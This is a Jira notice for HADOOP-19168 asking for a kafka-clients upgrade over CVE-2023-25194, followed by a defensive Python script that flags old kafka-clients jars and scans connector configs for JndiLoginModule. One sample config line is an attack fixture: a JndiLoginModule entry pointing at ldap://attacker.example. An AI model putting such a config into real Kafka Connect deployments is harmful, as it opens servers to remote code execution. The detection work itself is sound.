Rohit Kumar created HADOOP-19168:
------------------------------------
Summary: Upgrade Kafka Clients due to CVEs
Key: HADOOP-19168
URL: https://issues.apache.org/jira/browse/HADOOP-19168
Project: Hadoop Common
Issue Type: Task
Reporter: Rohit Kumar
Upgrade Kafka Clients due to CVEs
CVE-2023-25194: Affected versions of this package are vulnerable to
Deserialization of Untrusted Data when there are gadgets in the
classpath. The server will connect to the attacker's LDAP server and
deserialize the LDAP response, which the attacker can use to execute Java
deserialization gadget chains on the Kafka Connect server.
CVSS Score: 8.8 (High)
[https://nvd.nist.gov/vuln/detail/CVE-2023-25194]
CVE-2021-38153
CVE-2018-17196
Insufficient Entropy
[https://security.snyk.io/package/maven/org.apache.kafka:kafka-clients]
Upgrade Kafka-Clients to 3.4.0 or higher.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
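Added example (an audit script written for this page, not code from HADOOP-19168, Hadoop or Kafka): it flags kafka-clients jars older than 3.4.0 on a ':'-separated path list such as the output of "hadoop classpath", and scans Kafka Connect connector properties for a sasl.jaas.config value that names com.sun.security.auth.module.JndiLoginModule, which is the entry point the NVD advisory linked above describes for CVE-2023-25194. The sample classpath and connector properties are constructed; treating a pre-release build of exactly 3.4.0 (such as 3.4.0-SNAPSHOT) as unfixed is a conservative choice of this script, not something the issue states.

```python
"""Audit helper for the kafka-clients upgrade discussed in HADOOP-19168.

Flags kafka-clients jars below 3.4.0 (CVE-2023-25194 fix level) and Kafka
Connect configs whose sasl.jaas.config names JndiLoginModule.
"""
import re
from typing import List, Optional, Tuple

# First kafka-clients release with the CVE-2023-25194 fix ("3.4.0 or higher").
FIXED_VERSION = (3, 4, 0)

# Matches the jar name at the end of a classpath entry, e.g.
# kafka-clients-2.8.1.jar or kafka-clients-3.4.0-SNAPSHOT.jar, capturing the
# numeric version and an optional pre-release qualifier.
_JAR_RE = re.compile(
    r"(?:^|/)kafka-clients-(\d+(?:\.\d+)*)(?:-([A-Za-z0-9.]+))?\.jar$"
)

# Login module named in the public advisory as the JNDI/LDAP entry point.
JNDI_LOGIN_MODULE = "com.sun.security.auth.module.JndiLoginModule"


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.4' -> (3, 4, 0); padded so tuples compare element-wise (3.10 > 3.4)."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * max(0, 3 - len(parts))


def is_fixed(version: str, qualifier: Optional[str] = None) -> bool:
    """True when the jar is at or above 3.4.0.

    A pre-release build of exactly 3.4.0 (e.g. 3.4.0-SNAPSHOT) is treated as
    unfixed because it may predate the patch; qualifiers on later versions
    are accepted.
    """
    parsed = parse_version(version)
    if parsed > FIXED_VERSION:
        return True
    if parsed == FIXED_VERSION:
        return qualifier is None
    return False


def find_kafka_clients_jars(classpath: str) -> List[Tuple[str, str, Optional[str]]]:
    """Return (path, version, qualifier) for every kafka-clients jar on a
    ':'-separated classpath such as the output of `hadoop classpath`."""
    found = []
    for entry in classpath.split(":"):
        entry = entry.strip()
        match = _JAR_RE.search(entry)
        if match:
            found.append((entry, match.group(1), match.group(2)))
    return found


def vulnerable_jars(classpath: str) -> List[str]:
    """Paths of kafka-clients jars that still need the upgrade."""
    return [
        path
        for path, version, qualifier in find_kafka_clients_jars(classpath)
        if not is_fixed(version, qualifier)
    ]


def jndi_jaas_lines(config_text: str) -> List[int]:
    """1-based line numbers of sasl.jaas.config entries (including the
    consumer.override./producer.override./admin.override. forms a connector
    config can carry) whose value names JndiLoginModule."""
    hits = []
    for number, line in enumerate(config_text.splitlines(), start=1):
        key, _, value = line.partition("=")
        if key.strip().endswith("sasl.jaas.config") and JNDI_LOGIN_MODULE in value:
            hits.append(number)
    return hits


# Constructed sample inputs; not taken from any real deployment.
SAMPLE_CLASSPATH = ":".join([
    "/opt/hadoop/share/hadoop/common/lib/kafka-clients-2.8.1.jar",
    "/opt/hadoop/share/hadoop/tools/lib/kafka-clients-3.4.0.jar",
    "/opt/hadoop/lib/kafka-clients-3.4.0-SNAPSHOT.jar",
    "/opt/hadoop/lib/kafka-clients-3.6.1.jar",
    "/opt/hadoop/share/hadoop/common/lib/guava-27.0-jre.jar",
])

SAMPLE_CONNECTOR_PROPS = """\
name=example-sink
connector.class=org.example.SinkConnector
consumer.override.sasl.jaas.config=com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker.example/x";
producer.override.sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required username="svc" password="REDACTED";
"""

if __name__ == "__main__":
    for path in vulnerable_jars(SAMPLE_CLASSPATH):
        print("needs upgrade:", path)
    for number in jndi_jaas_lines(SAMPLE_CONNECTOR_PROPS):
        print("JndiLoginModule in sasl.jaas.config at line", number)
```

In practice, feed it the real output of "hadoop classpath" and the connector configs returned by the Connect REST API (GET /connectors/{name}/config). The jar check is the primary control, since 3.4.0 is where the fix lands; the config scan is defence in depth for workers that cannot be upgraded immediately.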